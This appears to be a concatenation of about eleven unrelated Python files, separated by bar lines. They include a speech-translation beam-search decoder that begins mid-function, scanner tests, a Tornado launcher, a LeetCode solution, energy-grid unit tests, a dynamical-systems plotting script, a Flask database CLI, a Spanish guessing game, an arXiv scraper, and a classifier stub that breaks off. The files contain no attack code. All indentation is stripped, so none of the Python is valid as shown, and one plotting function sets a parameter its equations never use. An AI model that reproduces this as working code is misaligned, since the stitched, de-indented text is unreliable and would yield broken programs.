logging.info(f'tgt_lang_id: {tgt_lang_id} - y: {y}')
src_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[0])
y_asr = char_list_src.index(src_lang_id)
logging.info(f'src_lang_id: {src_lang_id} - y_asr: {y_asr}')
else:
y = self.sos_tgt
y_asr = self.sos_src
logging.info(f'<sos> index: {str(y)}; <sos> mark: {char_list_tgt[y]}')
logging.info(f'<sos> index asr: {str(y_asr)}; <sos> mark asr: {char_list_src[y_asr]}')
enc_output = self.encode(x).unsqueeze(0)
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
# search parms
beam = trans_args.beam_size
penalty = trans_args.penalty
vy = h.new_zeros(1).long()
if trans_args.maxlenratio == 0:
maxlen = h.shape[0]
else:
maxlen = max(1, int(trans_args.maxlenratio * h.size(0)))
if trans_args.maxlenratio_asr == 0:
maxlen_asr = h.shape[0]
else:
maxlen_asr = max(1, int(trans_args.maxlenratio_asr * h.size(0)))
minlen = int(trans_args.minlenratio * h.size(0))
minlen_asr = int(trans_args.minlenratio_asr * h.size(0))
logging.info(f'max output length: {str(maxlen)}; min output length: {str(minlen)}')
logging.info(f'max output length asr: {str(maxlen_asr)}; min output length asr: {str(minlen_asr)}')
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
logging.info('initializing hypothesis...')
hyp = {'score': 0.0, 'yseq': [y], 'yseq_asr': [y_asr]}
hyps = [hyp]
ended_hyps = []
traced_decoder = None
for i in six.moves.range(max(maxlen, maxlen_asr)):
logging.info('position ' + str(i))
hyps_best_kept = []
for idx, hyp in enumerate(hyps):
if self.wait_k_asr > 0:
if i < self.wait_k_asr:
ys_mask = subsequent_mask(1).unsqueeze(0)
else:
ys_mask = subsequent_mask(i - self.wait_k_asr + 1).unsqueeze(0)
else:
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
if self.wait_k_st > 0:
if i < self.wait_k_st:
ys_mask_asr = subsequent_mask(1).unsqueeze(0)
else:
ys_mask_asr = subsequent_mask(i - self.wait_k_st + 1).unsqueeze(0)
else:
ys_mask_asr = subsequent_mask(i + 1).unsqueeze(0)
ys_asr = torch.tensor(hyp['yseq_asr']).unsqueeze(0)
start = time.time()
# FIXME: jit does not match non-jit result
if use_jit:
if traced_decoder is None:
traced_decoder = torch.jit.trace(self.decoder.forward_one_step,
(ys, ys_mask, enc_output))
local_att_scores = traced_decoder(ys, ys_mask, enc_output)[0]
else:
if (hyp['yseq_asr'][-1] != self.eos_src or i < 2) and i >= self.wait_k_st:
if self.cross_to_asr:
y_cross = self.decoder.embed(ys)
cross_mask_asr = create_cross_mask(ys_asr, ys, self.ignore_id, wait_k_cross=self.wait_k_st)
if (self.cross_self_from == "before-self" and self.cross_self) or \
(self.cross_src_from == "before-self" and self.cross_src):
y_cross = self.decoder.decoders[0].norm1(y_cross)
local_att_scores_asr = self.decoder_asr.forward_one_step(ys_asr, ys_mask_asr, enc_output,
cross=y_cross, cross_mask=cross_mask_asr,
cross_self=self.cross_self, cross_src=self.cross_src)[0]
else:
local_att_scores_asr = self.decoder_asr.forward_one_step(ys_asr, ys_mask_asr, enc_output)[0]
# If using 2 separate dictionaries
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores_asr = self.output_layer_asr(local_att_scores_asr)
if score_is_prob:
local_att_scores_asr = torch.exp(local_att_scores_asr)
else:
local_att_scores_asr = None
if (hyp['yseq'][-1] != self.eos_tgt or i < 2) and i >= self.wait_k_asr:
if self.cross_to_st:
cross_mask = create_cross_mask(ys, ys_asr, self.ignore_id, wait_k_cross=self.wait_k_asr)
y_cross = self.decoder_asr.embed(ys_asr)
if (self.cross_self_from == "before-self" and self.cross_self) or \
(self.cross_src_from == "before-self" and self.cross_src):
y_cross = self.decoder_asr.decoders[0].norm1(y_cross)
local_att_scores = self.decoder.forward_one_step(ys, ys_mask, enc_output,
cross=y_cross, cross_mask=cross_mask,
cross_self=self.cross_self, cross_src=self.cross_src)[0]
else:
local_att_scores = self.decoder.forward_one_step(ys, ys_mask, enc_output)[0]
# If using 2 separate dictionaries
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores = self.output_layer(local_att_scores)
if score_is_prob:
local_att_scores = torch.exp(local_att_scores)
else:
local_att_scores = None
start = time.time()
if local_att_scores is not None and local_att_scores_asr is not None:
local_att_scores_asr = decode_asr_weight * local_att_scores_asr
xk, ixk = local_att_scores.topk(beam)
yk, iyk = local_att_scores_asr.topk(beam)
S = (torch.mm(torch.t(xk), torch.ones_like(xk))
+ torch.mm(torch.t(torch.ones_like(yk)), yk))
s2v = torch.LongTensor([[i, j] for i in ixk.squeeze(0) for j in iyk.squeeze(0)]) # (k^2) x 2
# Do not force diversity
if ratio_diverse_st <= 0 and ratio_diverse_asr <=0:
local_best_scores, id2k = S.view(-1).topk(beam)
I = s2v[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
# Force diversity for ST only
if ratio_diverse_st > 0 and ratio_diverse_asr <= 0:
ct = int((1 - ratio_diverse_st) * beam)
s2v = s2v.reshape(beam, beam, 2)
Sc = S[:, :ct]
local_best_scores, id2k = Sc.flatten().topk(beam)
I = s2v[:, :ct]
I = I.reshape(-1, 2)
I = I[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
# Force diversity for ASR only
if ratio_diverse_asr > 0 and ratio_diverse_st <= 0:
cr = int((1 - ratio_diverse_asr) * beam)
s2v = s2v.reshape(beam, beam, 2)
Sc = S[:cr, :]
local_best_scores, id2k = Sc.view(-1).topk(beam)
I = s2v[:cr, :]
I = I.reshape(-1, 2)
I = I[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
# Force diversity for both ST and ASR
if ratio_diverse_st > 0 and ratio_diverse_asr > 0:
cr = int((1 - ratio_diverse_asr) * beam)
ct = int((1 - ratio_diverse_st) * beam)
ct = max(ct, math.ceil(beam // cr))
s2v = s2v.reshape(beam, beam, 2)
Sc = S[:cr, :ct]
local_best_scores, id2k = Sc.flatten().topk(beam)
I = s2v[:cr, :ct]
I = I.reshape(-1, 2)
I = I[id2k]
local_best_ids_st = I[:,0]
local_best_ids_asr = I[:,1]
elif local_att_scores is not None:
local_best_scores, local_best_ids_st = torch.topk(local_att_scores, beam, dim=1)
local_best_scores = local_best_scores.squeeze(0)
local_best_ids_st = local_best_ids_st.squeeze(0)
elif local_att_scores_asr is not None:
local_best_scores, local_best_ids_asr = torch.topk(local_att_scores_asr, beam, dim=1)
local_best_ids_asr = local_best_ids_asr.squeeze(0)
local_best_scores = local_best_scores.squeeze(0)
else:
raise NotImplementedError
if debug:
logging.info(f'score time = {time.time() - start}')
start = time.time()
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq_asr'] = [0] * (1 + len(hyp['yseq_asr']))
new_hyp['yseq_asr'][:len(hyp['yseq_asr'])] = hyp['yseq_asr']
if local_att_scores is not None:
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids_st[j])
else:
if i >= self.wait_k_asr:
new_hyp['yseq'][len(hyp['yseq'])] = self.eos_tgt
else:
new_hyp['yseq'] = hyp['yseq']
if local_att_scores_asr is not None:
new_hyp['yseq_asr'][len(hyp['yseq_asr'])] = int(local_best_ids_asr[j])
else:
if i >= self.wait_k_st:
new_hyp['yseq_asr'][len(hyp['yseq_asr'])] = self.eos_src
else:
new_hyp['yseq_asr'] = hyp['yseq_asr']
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
# sort and get nbest
hyps = hyps_best_kept
logging.debug('number of pruned hypothes: ' + str(len(hyps)))
# add eos in the final loop to avoid that there are no ended hyps
if i == maxlen - 1:
logging.info('adding <eos> in the last postion in the loop')
for hyp in hyps:
if hyp['yseq'][-1] != self.eos_tgt:
hyp['yseq'].append(self.eos_tgt)
if i == maxlen_asr - 1:
logging.info('adding <eos> in the last postion in the loop for asr')
for hyp in hyps:
if hyp['yseq_asr'][-1] != self.eos_src:
hyp['yseq_asr'].append(self.eos_src)
# add ended hypothes to a final list, and removed them from current hypothes
# (this will be a problem, number of hyps < beam)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == self.eos_tgt and hyp['yseq_asr'][-1] == self.eos_src:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen and len(hyp['yseq_asr']) > minlen_asr:
hyp['score'] += (i + 1) * penalty
# if rnnlm: # Word LM needs to add final <eos> score
# hyp['score'] += trans_args.lm_weight * rnnlm.final(
# hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and trans_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
break
hyps = remained_hyps
if len(hyps) > 0:
logging.info('remained hypothes: ' + str(len(hyps)))
else:
logging.info('no hypothesis. Finish decoding.')
break
if char_list_tgt is not None and char_list_src is not None:
for hyp in hyps:
logging.info('hypo: ' + ''.join([char_list_tgt[int(x)] for x in hyp['yseq']]))
logging.info('hypo asr: ' + ''.join([char_list_src[int(x)] for x in hyp['yseq_asr']]))
logging.info('best hypo: ' + ''.join([char_list_tgt[int(x)] for x in hyps[0]['yseq']]))
logging.info('best hypo asr: ' + ''.join([char_list_src[int(x)] for x in hyps[0]['yseq_asr']]))
logging.info('number of ended hypothes: ' + str(len(ended_hyps)))
nbest_hyps = sorted(
ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), trans_args.nbest)]
# check number of hypotheis
if len(nbest_hyps) == 0:
logging.warning('there is no N-best results, perform recognition again with smaller minlenratio.')
# should copy because Namespace will be overwritten globally
trans_args = Namespace(**vars(trans_args))
trans_args.minlenratio = max(0.0, trans_args.minlenratio - 0.1)
trans_args.minlenratio_asr = max(0.0, trans_args.minlenratio_asr - 0.1)
return self.recognize_and_translate_sum(x, trans_args, char_list_tgt, char_list_src, rnnlm)
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps
def calculate_all_attentions(self, xs_pad, ilens, ys_pad, ys_pad_src):
"""E2E attention calculation.
:param torch.Tensor xs_pad: batch of padded input sequences (B, Tmax, idim)
:param torch.Tensor ilens: batch of lengths of input sequences (B)
:param torch.Tensor ys_pad: batch of padded token id sequence tensor (B, Lmax)
:param torch.Tensor ys_pad_src: batch of padded token id sequence tensor (B, Lmax)
:return: attention weights with the following shape,
1) multi-head case => attention weights (B, H, Lmax, Tmax),
2) other case => attention weights (B, Lmax, Tmax).
:rtype: float ndarray
"""
with torch.no_grad():
self.forward(xs_pad, ilens, ys_pad, ys_pad_src)
ret = dict()
for name, m in self.named_modules():
if isinstance(m, MultiHeadedAttention) and m.attn is not None: # skip MHA for submodules
ret[name] = m.attn.cpu().numpy()
return ret
|
from . import check, v
assert v # Silence pyflakes.
def test_old_format_string(v):
v.scan("'%(a)s, %(b)d' % locals()")
check(v.used_names, ['a', 'b', 'locals'])
def test_new_format_string(v):
v.scan("'{a}, {b:0d} {c:<30} {d:.2%}'.format(**locals())")
check(v.used_names, ['a', 'b', 'c', 'd', 'locals'])
def test_new_format_string_access(v):
v.scan("'{a.b}, {c.d.e} {f[g]} {h[i][j]}'.format(**locals())")
check(v.used_names, ['a', 'c', 'f', 'h', 'locals'])
def test_new_format_string_attributes(v):
v.scan("'{a.b}, {c.d.e} {f[g]} {h[i][j].k}'.format(**locals())")
check(v.used_names, ['a', 'c', 'f', 'h', 'locals'])
check(v.used_attrs, ['b', 'd', 'e', 'k', 'format'])
def test_new_format_string_numbers(v):
v.scan("'{0.b}, {0.d.e} {0[1]} {0[1][1].k}'.format('foo')")
check(v.used_names, [])
check(v.used_attrs, ['b', 'd', 'e', 'k', 'format'])
def test_incorrect_format_string(v):
v.scan('"{"')
v.scan('"{!-a:}"')
check(v.used_names, [])
check(v.used_attrs, [])
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
启动系统服务器
默认参数保存在 settings.py 中,也可以通过命令行指定(--help 查看所有的命令行参数)。
如果要使用 80 等端口,可能需要 "sudo ./run.py --port=80"。
"""
import threading
from datetime import datetime
from pprint import pprint
from optparse import OptionParser, OptionGroup
from tornadoweb import *
from action import *
import settings
def _show_info(app):
"""
显示系统信息
"""
print ("Server start on port {0} (processes: {1}) ...".format(app.port, app.processes))
print ("Start time: {0}".format(datetime.now().isoformat(" ")))
print
print ("Parameters:")
for k in sorted(dir(__conf__)):
if k.startswith("__"): continue
print (" {0:<20} : {1}".format(k, getattr(__conf__, k)))
print
print ("Handlers:")
handlers = sorted(app.handlers, key = lambda h: h[0])
pprint(handlers)
print
def _get_opt():
parser = OptionParser("%prog [options]", version="%prog v0.9")
parser.add_option("--port", dest = "port", default = 0, help = "Listen port.")
parser.add_option("--config", dest = "config", default = "settings.py", help = "config")
return parser.parse_args()
def main():
opts, args = _get_opt()
ConfigLoader.load(opts.config)
run(port = opts.port, config = opts.config, callback = _show_info)
if __name__ == "__main__":
main()
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def convertBiNode(self, root: TreeNode) -> TreeNode:
self.root = self.leaf = TreeNode()
self.inorderTraverse(root)
return self.root.right
def inorderTraverse(self, root: TreeNode) -> None:
if not root: return
self.inorderTraverse(root.left)
self.leaf.right = root
self.leaf = root
root.left = None
self.inorderTraverse(root.right)
|
import pytest
from flaskbb.plugins.manager import FlaskBBPluginManager
@pytest.fixture
def plugin_manager():
return FlaskBBPluginManager("flaskbb")
|
"""Test agent"""
import unittest
# from aries.core.grid.agent import Agent, Battery, ElectricalVehicle, PVPanel, WaterTank, WindGenerator
import aries.core.grid.agent as agent
# Agent constants
AGENT_NAME = "agent1"
VOLTAGE_RATING = 230
POWER_RATING = 1900
POWER_FACTOR = 0.95
INCOMING_POWER = 1234
REQUEST_INJECT_POWER = 123
REQUEST_POWER_FACTOR = 0.95
# Battery constants
VOLTAGE = 24
CAPACITY = 1296000
STATUS = 123414
CONTRIBUTION_ACTIVE = 0.5
CONTRIBUTION_REACTIVE = 0.3
INVERTER_INPUT_VOLTAGE = 24
INVERTER_OUTPUT_VOLTAGE = 230
INVERTER_EFFICIENCY = 0.87
ACTIVE = 0
# ElectricalVehicle constants
CONSUMPTION = 20
CHARGE_CURRENT = 123
POWER_SUPPLIER = 1
# PV panel constants
UNIT_AREA = 1
SERIES = 50
PARALLELS = 50
EFFICIENCY = 0.8
SOLAR_IRRADIANCE = 100
BATTERY_COUPLING_EFFICIENCY = 1
HEATING_CONTRIBUTION = 200
# Water tank properties
TEMP = 80
RESISTANCE = 50
# Wind generator properties
WIND_SPEED = 10
POWER_COEFFICIENT = 0.59
AIR_DENSITY = 1.225
AREA = 2
class TestAgent(unittest.TestCase):
"""Tests for agent"""
def test_agent_assigned_properties(self):
self.agent = agent.Agent.from_properties(name=AGENT_NAME, voltage_rating=VOLTAGE_RATING, power_rating=POWER_RATING,
power_factor=POWER_FACTOR, incoming_power=INCOMING_POWER,
request_inject_power=REQUEST_INJECT_POWER,
request_power_factor=REQUEST_POWER_FACTOR)
self.assertEqual(self.agent.name, AGENT_NAME, "name is not equal")
self.assertEqual(self.agent.voltage_rating, VOLTAGE_RATING, "voltage_rating is not equal")
self.assertEqual(self.agent.power_rating, POWER_RATING, "power_rating is not equal")
self.assertEqual(self.agent.power_factor, POWER_FACTOR, "power_factor is not equal")
self.assertEqual(self.agent.incoming_power, INCOMING_POWER, "incoming_power is not equal")
self.assertEqual(self.agent.request_inject_power, REQUEST_INJECT_POWER, "request_inject_power is not equal")
self.assertEqual(self.agent.request_power_factor, REQUEST_POWER_FACTOR, "request_power_factor is not equal")
def test_validation(self):
"""Tests agent validation"""
j = {
"name": "test",
"voltage_rating": 123,
"power_rating": 1,
"power_factor": 1,
"incoming_power": 1,
"request_inject_power": 456,
"request_power_factor": 0.95
}
self.assertTrue(agent.Agent.validate(j), "Agent is not valid")
class TestBattery(unittest.TestCase):
"""Tests for battery"""
def setUp(self):
self.battery = agent.Battery.from_properties(voltage=VOLTAGE, capacity=CAPACITY, status=STATUS,
contribution_active=CONTRIBUTION_ACTIVE,
contribution_reactive=CONTRIBUTION_REACTIVE,
inverter_input_voltage=INVERTER_INPUT_VOLTAGE,
inverter_output_voltage=INVERTER_OUTPUT_VOLTAGE,
inverter_efficiency=INVERTER_EFFICIENCY,
active=ACTIVE)
def test_battery_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.battery.voltage, VOLTAGE, "voltage is not equal")
self.assertEqual(self.battery.capacity, CAPACITY, "capacity is not equal")
self.assertEqual(self.battery.status, STATUS, "status is not equal")
self.assertEqual(self.battery.contribution_active, CONTRIBUTION_ACTIVE, "contribution_active is not equal")
self.assertEqual(self.battery.contribution_reactive, CONTRIBUTION_REACTIVE,
"contribution_reactive is not equal")
self.assertEqual(self.battery.inverter_input_voltage, INVERTER_INPUT_VOLTAGE,
"inverter_input_voltage is not equal")
self.assertEqual(self.battery.inverter_output_voltage, INVERTER_OUTPUT_VOLTAGE,
"inverter_output_voltage is not equal")
self.assertEqual(self.battery.inverter_efficiency, INVERTER_EFFICIENCY, "inverter_efficiency is not equal")
self.assertEqual(self.battery.active, ACTIVE, "active is not equal")
class TestElectricalVehicle(unittest.TestCase):
"""Tests for electrical vehicle"""
def setUp(self):
self.electrical_vehicle = agent.ElectricalVehicle.from_properties(voltage=VOLTAGE, capacity=CAPACITY,
status=STATUS,
consumption=CONSUMPTION,
contribution_active=CONTRIBUTION_ACTIVE,
contribution_reactive=CONTRIBUTION_REACTIVE,
inverter_input_voltage=INVERTER_INPUT_VOLTAGE,
inverter_output_voltage=INVERTER_OUTPUT_VOLTAGE,
inverter_efficiency=INVERTER_EFFICIENCY,
charge_current=CHARGE_CURRENT,
power_supplier=POWER_SUPPLIER,
active=ACTIVE)
def test_electrical_vehicle_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.electrical_vehicle.voltage, VOLTAGE, "voltage is not equal")
self.assertEqual(self.electrical_vehicle.capacity, CAPACITY, "capacity is not equal")
self.assertEqual(self.electrical_vehicle.status, STATUS, "status is not equal")
self.assertEqual(self.electrical_vehicle.consumption, CONSUMPTION, "consumption is not equal")
self.assertEqual(self.electrical_vehicle.contribution_active, CONTRIBUTION_ACTIVE,
"contribution_active is not equal")
self.assertEqual(self.electrical_vehicle.contribution_reactive, CONTRIBUTION_REACTIVE,
"contribution_reactive is not equal")
self.assertEqual(self.electrical_vehicle.inverter_input_voltage, INVERTER_INPUT_VOLTAGE,
"inverter_input_voltage is not equal")
self.assertEqual(self.electrical_vehicle.inverter_output_voltage, INVERTER_OUTPUT_VOLTAGE,
"inverter_output_voltage is not equal")
self.assertEqual(self.electrical_vehicle.inverter_efficiency, INVERTER_EFFICIENCY,
"inverter_efficiency is not equal")
self.assertEqual(self.electrical_vehicle.charge_current, CHARGE_CURRENT, "charge_current is not equal")
self.assertEqual(self.electrical_vehicle.power_supplier, POWER_SUPPLIER, "power_supplier is not equal")
self.assertEqual(self.electrical_vehicle.active, ACTIVE, "active is not equal")
class TestPVPanel(unittest.TestCase):
"""Test for PV panel"""
def setUp(self):
self.pv_panel = agent.PVPanel.from_properties(unit_area=UNIT_AREA, series=SERIES, parallels=PARALLELS,
efficiency=EFFICIENCY,
solar_irradiance=SOLAR_IRRADIANCE,
battery_coupling_efficiency=BATTERY_COUPLING_EFFICIENCY,
heating_contribution=HEATING_CONTRIBUTION,
active=ACTIVE)
def test_pv_panel_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.pv_panel.series, SERIES, "series is not equal")
self.assertEqual(self.pv_panel.parallels, PARALLELS, "parallels is not equal")
self.assertEqual(self.pv_panel.efficiency, EFFICIENCY, "efficiency is not equal")
self.assertEqual(self.pv_panel.solar_irradiance, SOLAR_IRRADIANCE, "solar_irradiance is not equal")
self.assertEqual(self.pv_panel.heating_contribution, HEATING_CONTRIBUTION, "heating_contribution is not equal")
self.assertEqual(self.pv_panel.active, ACTIVE, "active is not equal")
class TestWaterTank(unittest.TestCase):
"""Tests for water tank"""
def setUp(self):
self.water_tank = agent.WaterTank.from_properties(capacity=CAPACITY, temp=TEMP,
active=ACTIVE)
def test_water_tank_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.water_tank.capacity, CAPACITY, "capacity is not equal")
self.assertEqual(self.water_tank.temp, TEMP, "temp is not equal")
self.assertEqual(self.water_tank.active, ACTIVE, "active is not equal")
class TestWindGenerator(unittest.TestCase):
"""Tests for wind generator"""
def setUp(self):
self.wind_generator = agent.WindGenerator.from_properties(power_coefficient=POWER_COEFFICIENT,
air_density=AIR_DENSITY, area=AREA, wind_speed=WIND_SPEED,
battery_coupling_efficiency=BATTERY_COUPLING_EFFICIENCY,
active=ACTIVE)
def test_wind_generator_assigned_properties(self):
"""Test if properties assigned correctly"""
self.assertEqual(self.wind_generator.power_coefficient, POWER_COEFFICIENT, "efficiency is not equal")
self.assertEqual(self.wind_generator.air_density, AIR_DENSITY, "air_density is not equal")
self.assertEqual(self.wind_generator.area, AREA, "area is not equal")
self.assertEqual(self.wind_generator.wind_speed, WIND_SPEED, "wind_speed is not equal")
self.assertEqual(self.wind_generator.active, ACTIVE, "active is not equal")
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import solver
mu = -0.8645
def homoclinic (S, t):
x, y = S
return (np.array([y,
mu * y + x - np.square(x) + x * y]))
def numInt (Ttrans, Teval, dt, X0):
s = solver.ODE_Solver()
time, sol = s.solveODE(homoclinic, X0, Ttrans, Teval, dt, 1,
"explicitRungeKutta4")
X = sol[0, :]
Y = sol[1, :]
return (time, X, Y)
def plotTimeSeries ():
myfontsize = 20.0
dt = 1e-2
Ttrans1 = 0.0
Teval1 = 8.0
X0_1 = [0.0, 1.0]
Ttrans2 = 0.0
Teval2 = 47.0
X0_2 = [0.3263, 0.0]
global mu
time1, X1, Y1 = numInt(Ttrans1, Teval1, dt, X0_1)
time2, X2, Y2 = numInt(Ttrans2, Teval2, dt, X0_2)
'''
fig, ax = plt.subplots()
fig.set_size_inches(5.9, 5.9)
# ~ ax.set_aspect(4.4 / 3.4)
plt.subplots_adjust(top=0.99, bottom=0.13, left=0.15, right=0.99)
plt.plot(time2, X2, color="red", label=r"$x(t)$")
plt.plot(time2, Y2, color="blue", label=r"$y(t)$")
plt.text(21.5, -0.13, r"$\mu=$" + str(mu), fontsize=20, bbox={"facecolor":"white", "edgecolor":"none", "alpha":0.95})
plt.xlabel(r"time $t$", fontsize=myfontsize)
plt.xticks([0.0, 10.0, 20.0, 30.0], fontsize=myfontsize)
plt.yticks([-0.5, 0.0, 0.5, 1.0, 1.5], fontsize=myfontsize)
plt.legend(fancybox=True, framealpha=1.0, loc="lower right", fontsize=myfontsize)
plt.grid(color="lightgray")
'''
fig, ax = plt.subplots()
fig.set_size_inches(5.9, 5.9)
ax.set_aspect(1)
plt.subplots_adjust(top=0.99, bottom=0.13, left=0.15, right=1.00)
y, x = np.mgrid[-2.5:2.5:75j, -2.5:2.5:75j]
u = y
v = mu * y + x - np.square(x) + x * y
plt.streamplot(x, y, u, v, color="lightgray")
plt.plot(X1, Y1, color="black", linestyle="--")
plt.plot(X1[0], Y1[0], color="gray", marker="o", markersize=8)
plt.plot(X2, Y2, color="black")
plt.plot(X2[0], Y2[0], color="gray", marker="o", markersize=8)
plt.xlim(-2.2, 2.2)
plt.ylim(-2.2, 2.2)
plt.text(-0.69, 1.55, r"$\mu=$" + str(mu), fontsize=myfontsize, bbox={"facecolor":"white", "edgecolor":"none", "alpha":0.95})
plt.xlabel(r"$x$", fontsize=myfontsize)
plt.ylabel(r"$y$", fontsize=myfontsize)
plt.xticks([-2.0, -1.0, 0.0, 1.0, 2.0], fontsize=myfontsize)
plt.yticks([-2.0, -1.0, 0.0, 1.0, 2.0], fontsize=myfontsize)
plt.grid(color="lightgray")
plt.show()
def plotSNIPERbifurcationDiagram ():
myfontsize = 18.0
Ttrans = 100.0
Teval = 100.0
dt = 1e-2
X0 = [0.0, 1e-3]
nSteps = int(Teval / dt)
bList = np.arange(0.025, 2.0 + 1e-5, 0.025)
X = np.zeros((nSteps, bList.size))
Y = np.zeros((nSteps, bList.size))
i = 0
global b
for B in bList:
b = B
time, x, y = numInt(Ttrans, Teval, dt, X0)
X[:, i] = x
Y[:, i] = y
i += 1
print(i, " of ", bList.size, " simulations")
one = np.ones(X[:, 0].shape)
fig = plt.figure()
ax = fig.add_subplot(111, projection="3d")
fig.set_size_inches(5.9, 4.8)
plt.rcParams.update({"font.size": myfontsize})
plt.subplots_adjust(top=1.05, bottom=0.13, left=0.01, right=0.99)
for i in np.arange(bList.size):
ax.scatter(bList[i] * one, X[:, i], Y[:, i], color="black", s=0.1)
ax.view_init(elev=30.0, azim=-120.0)
ax.zaxis.set_rotate_label(False)
ax.set_xlabel(r"bifurcation parameter $b$", fontsize=myfontsize)
ax.set_ylabel(r"$x$", fontsize=myfontsize)
ax.set_zlabel(r"$y$", fontsize=myfontsize, rotation=90.0)
ax.set_xlim(-0.1, 2.1)
ax.xaxis.set_tick_params(labelsize=myfontsize)
ax.yaxis.set_tick_params(labelsize=myfontsize)
ax.zaxis.set_tick_params(labelsize=myfontsize)
ax.xaxis.labelpad=18 #19
ax.yaxis.labelpad=9 #15
ax.zaxis.labelpad=4 #7
ax.set_xticks([0.0, 1.0, 2.0])
ax.set_yticks([-1.0, 0.0, 1.0])
ax.set_zticks([-1.0, 0.0, 1.0])
plt.show()
plotTimeSeries()
# ~ plotSNIPERbifurcationDiagram()
|
import click
import time
from flask.cli import AppGroup
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
db_cli = AppGroup('db')
# TODO: Add support for schema migrations
@db_cli.command('init')
def init_db():
"""
Create schema
"""
db.create_all()
@db_cli.command('wait')
def wait_db():
"""
Wait database to be available during 30 seconds
"""
retries = 30
for i in range(retries):
try:
db.session.execute('SELECT 1')
return
except Exception as e:
if i >= retries-1:
raise e
time.sleep(1)
|
# PARTE 1
# Para el ejercicio del primer capítulo, hay que utilizar lo que sigue:
# import random
# numero = random.randint(0, 100)
# Para resaltar el segundo capítulo, hay que utilizar lo que sigue:
print("Introduzca el número a adivinar")
while True:
# Entramos en un bucle infinito
# Pedimos introducir un número
numero = input("Introduzca un número entre 0 y 99 incluídos: ")
try:
numero = int(numero)
except:
pass
else:
# Hacer la comparación
if 0 <= numero <= 99:
# Tenemos lo que queremos, salimos del bucle
break
# PARTE 2
print("intente encontrar el número a adivinar")
while True: # BUCLE 1
# Entramos en un bucle infinito
# que permite jugar varios turnos
while True: # BUCLE 2
# Entramos en un bucle infinito
# que permite corregir un error de escritura
# Pedimos introducir un número
intento = input("Introduzca un número entre 0 y 99 incluídos: ")
try:
intento = int(intento)
except:
pass
else:
# Hacer la comparación
if 0 <= intento <= 99:
# Tenemos lo que queremos, salimos del BUCLE 2
break
# Se prueba si el intento es correcto o no
if intento < numero:
print("Demasiado pequeño")
elif intento > numero:
print("Demasiado grande")
else:
print("Victoria!")
# Terminamos la partida, salimos del BUCLE 1
break
|
import sys
import smtplib
import requests
import bs4
import os
import re
import json
from email.mime.text import MIMEText
# adapter
with open('/Users/axellaborieux/watchArxiv_perso/watchAuthors.json', 'r') as f:
args = json.loads(f.read())
old_total = args['total']
names = args['names']
surnames = args['surnames']
if sys.argv[1]=='add':
names.append(sys.argv[3])
surnames.append(sys.argv[2])
elif sys.argv[1]=='remove':
names.remove(sys.argv[3])
surnames.remove(sys.argv[2])
else:
print('something is not right, exiting!')
exit()
link = "https://arxiv.org/search/advanced?advanced="
for idx, (name, surname) in enumerate(zip(names, surnames)):
link += "&terms-"+str(idx)+"-operator=OR&terms-"+str(idx)+"-term="+name+"%2C+"+surname+"&terms-"+str(idx)+"-field=author"
link += "&classification-physics_archives=all&classification-include_cross_list=include&date-filter_by=all_dates&date-year=2021&date-from_date=&date-to_date=&date-date_type=submitted_date&abstracts=show&size=100&order=-announced_date_first"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
res = requests.get(link, headers=headers)
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text, features="html.parser")
results = soup.select('li.arxiv-result')
new_total = soup.select('h1.title')[0].getText().strip()
new_total = new_total.split(' ')
new_total = int(new_total[3].replace(',', ''))
with open('/Users/axellaborieux/watchArxiv_perso/watchAuthors.json', 'w') as json_file:
new = {'total': new_total,
'names': names,
'surnames': surnames}
json.dump(new, json_file, indent=4)
print('Succesfully updated total from {} to {}!'.format(old_total, new_total))
|
from bolsonaro.models.omp_forest import OmpForest, SingleOmpForest
from bolsonaro.utils import binarize_class_data, omp_premature_warning
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import OrthogonalMatchingPursuit
import warnings
class OmpForestBinaryClassifier(SingleOmpForest):
DEFAULT_SCORE_METRIC = 'indicator'
def __init__(self, models_parameters):
estimator = RandomForestClassifier(**models_parameters.hyperparameters,
random_state=models_parameters.seed, n_jobs=-1)
super().__init__(models_parameters, estimator)
def _check_classes(self, y):
